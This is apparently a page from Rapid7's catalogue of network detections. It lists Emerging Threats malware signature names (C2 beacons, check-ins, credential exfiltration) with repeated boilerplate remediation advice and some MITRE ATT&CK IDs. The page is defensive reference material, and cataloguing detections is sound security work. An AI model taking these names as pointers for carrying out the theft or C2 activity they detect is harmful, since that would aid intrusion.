ET MALWARE Syrutrk/Gibon/Bredolab Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sysget/HelloBridge HTTP GET CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE sysrv.ELF Exploit Success Payload Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE System Progressive Detection FakeAV (AMD)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE System Progressive Detection FakeAV (AuthenticAMD)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE System Progressive Detection FakeAV (GenuineIntel)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE System Progressive Detection FakeAV (INTEL)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats External IP Lookup Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats Payload Downloaded

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats Pierogi Backdoor Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats Pierogi CnC Activity (Upload)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA421/YTTRIUM/APT29 TLS Certificate M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA421/YTTRIUM/APT29 TLS Certificate M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA421/YTTRIUM/APT29 TLS Certificate M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA450 GRAMDOOR Telegram CnC Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA450 Nagual CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA450 Nagual/STARWHALE Beacon Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA450 Nagual/STARWHALE GoLang Beacon Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA453 ClumsyCover Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA453 ClumsyCover Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA453 Related Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA471 Malicious AutoIT File Upload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA505 P2P CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TABMSGSQL/Sluegot.C Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Taidoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Taidoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Targeted Activity - CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tatanga/Win32.Kexject.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Taurus Stealer CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Taurus Stealer CnC Host Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TDSServ or Tidserv variant Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TDSS/TDL/Alureon MBR rootkit Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TDTESS Backdoor User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TeamBot CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TeamTNT Gattling Gun AWS Creds Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TeleBots BCS-server CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE TeleBots BCS-server User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TeleBots VBS Backdoor CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE TeleBots VBS Backdoor CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE TellYouThePass Ransomware Checkin Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Tendrit CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Tendrit CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Terse Upload to Free Image Hosting Provider (uploads .im) - Likely Malware

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [TGI] Cobalt Strike Malleable C2 Request (O365 Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE [TGI] Cobalt Strike Malleable C2 Request (YouTube Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE [TGI] Cobalt Strike Malleable C2 Response (O365 Profile) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE [TGI] Cobalt Strike Malleable C2 Response (YouTube Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE [TGI] Py.Machete HTTP CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tibs Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tibs/Harnig Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tibs Trojan Downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup ABK Backdoor CnC Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup BROLER.F CnC Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup Datper CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup Datper CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup Datper CnC Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tick Group Payload - Reporting Error to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tick Group Payload - Submitting Encrypted Data to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tinba Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TinyTurla CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tonto_SPM Backdoor CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tordal/Hancitor/Chanitor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Torpig Reporting User Activity (wur8)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Torpig Reporting User Activity (x25)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tortoiseshell/HMH Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tortoiseshell/SysKit CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Towerweb Ransomware Landing Page

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE TransparentTribe APT Maldoc CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TransparentTribe APT Related Activity (POST)

Description

Recommendation

ET MALWARE Trickbot Checkin Response

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also operate as a dropper for follow-on malware, such as Ryuk, and for post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns that use a variety of phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated rapidly with new modules that extend its capabilities, including credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, since persistence artifacts change frequently. Provide electronic social engineering user training, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE Trickbot Payload Request

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also operate as a dropper for follow-on malware, such as Ryuk, and for post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns that use a variety of phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated rapidly with new modules that extend its capabilities, including credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, since persistence artifacts change frequently. Provide electronic social engineering user training, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE TripleNine RAT Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Agent.AIXD Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BackDoor-DRV.gen.c Reporting-1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Banker.Win32.Agent Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Bayrob Keepalive

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev Botnet Command Request CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Trojan.BlackRev Botnet Monitor Request CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Trojan.BlackRev Download Executable

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev Get Command Rev3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev Registering Client

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev Registration Rev3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev V1.Botnet HTTP Login POST Flood Traffic Outbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Dirtjump Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader.Bancos Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader GetBooks UA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader User-Agent BGroom

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader User-Agent (NOPE)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader User-Agent (Tiny)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Downloader.Win32.AutoIt.mj Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Downloader Win32.Genome.AV

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanDownloader Win32/Harnig.gen-P Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.Delf Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.Win32.Agent.ksja

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.Win32.StartPage.dvm or Mebromi Bios Rootkit CnC Count Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.Win32.Sysn.cdjy CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.FakeMS Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Generic.5325921 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Generic - POST To gate.php with no accept headers

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Generic - POST To gate.php with no referer

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Internet Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.JS.Agent.dwz Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.JS.QLP Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Kwampirs Outbound GET request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan/MSIL.bfsx Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan/MSIL.DOTHETUK CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.NSIS.Comame.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Nurjax Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Nurjax Downloading PE

Description

